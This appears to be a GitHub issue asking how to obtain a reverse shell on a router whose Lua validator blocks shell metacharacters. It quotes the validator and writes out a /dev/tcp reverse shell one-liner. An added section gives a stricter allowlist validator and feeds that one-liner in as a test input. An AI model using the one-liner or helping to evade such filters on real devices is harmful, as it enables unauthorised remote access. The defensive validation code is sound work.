[QUESTION] Is there a way of getting a reverse shell without using & and > #35

Open
mbana opened this issue Dec 25, 2023 · 0 comments

mbana commented Dec 25, 2023

Hi, I would appreciate all the help I can get. Ping @lukechilds and @uzil.

Summary: Is there another way of getting a reverse shell without using redirection etc?

Let's say I have this piece of code in my router hindering me from obtaining a reverse shell:

```lua
-- Assumed alias: the snippet calls a bare match(), so the original file
-- presumably defines it elsewhere like this.
local match = string.match

--- Helper function to check that the arguments that are passed to dnsget / ping do not contain special characters that make
-- the call turn into an exploit
-- @param str The string to check
-- @return true if the string does not contain an apparent exploit, false otherwise
local function check_for_exploit(str)
    if str then
        -- try to make sure the string is not an exploit in disguise
        -- it is about to be concatenated to a command so ...
        return match(str,"^[^<>%s%*%(%)%|&;~!?\\$]+$") and not (match(str,"^-") or match(str,"-$"))
    else
        return false
    end
end
```

This means I cannot use something like:

```sh
sh -i >& /dev/tcp/10.1.1.6/4444 0>&1
```

as the & and the > characters will cause check_for_exploit to return true.

Thanks,
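
From the defender's side, a stricter alternative to the character denylist quoted in the issue is to accept only values that parse as what `ping` / `dnsget` actually need: an IPv4 address or an RFC 1123 hostname. This is an added example, not code from the router firmware or from this project; `is_ipv4`, `is_hostname` and `is_safe_target` are hypothetical names and the sample inputs are constructed.

```lua
-- Added example, not firmware code. All function names are hypothetical.

-- Dotted-quad IPv4: four decimal octets, each 0..255, no leading zeros.
local function is_ipv4(s)
    local a, b, c, d = s:match("^(%d+)%.(%d+)%.(%d+)%.(%d+)$")
    if not a then return false end
    for _, octet in ipairs({a, b, c, d}) do
        if #octet > 3 or (#octet > 1 and octet:sub(1, 1) == "0")
            or tonumber(octet) > 255 then
            return false
        end
    end
    return true
end

-- RFC 1123 hostname: dot-separated labels of 1..63 ASCII letters, digits or
-- hyphens, no hyphen at either end of a label, at most 253 characters in total.
local function is_hostname(s)
    if #s == 0 or #s > 253 then return false end
    -- Append "." so every label, including the last, is dot-terminated.
    for label in (s .. "."):gmatch("([^%.]*)%.") do
        if #label < 1 or #label > 63
            or not label:match("^[A-Za-z0-9%-]+$")
            or label:match("^%-") or label:match("%-$") then
            return false
        end
    end
    return true
end

-- Accept a ping/dnsget target only if it parses as one of the two forms.
local function is_safe_target(str)
    if type(str) ~= "string" then return false end
    -- Digits and dots only: must be a valid IPv4 address, not a "hostname".
    if str:match("^[%d%.]+$") then return is_ipv4(str) end
    return is_hostname(str)
end

-- Constructed sample inputs; the last one is the command line quoted in the post.
local samples = {
    "10.1.1.6", "router.example.com", "256.1.1.1", "-c.example.com",
    "sh -i >& /dev/tcp/10.1.1.6/4444 0>&1",
}
for _, s in ipairs(samples) do
    print(string.format("%-40s %s", s, is_safe_target(s) and "accept" or "reject"))
end
```

Validation of this kind is strongest when the accepted value is also handed to the program as a separate argument instead of being concatenated into a shell command line.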
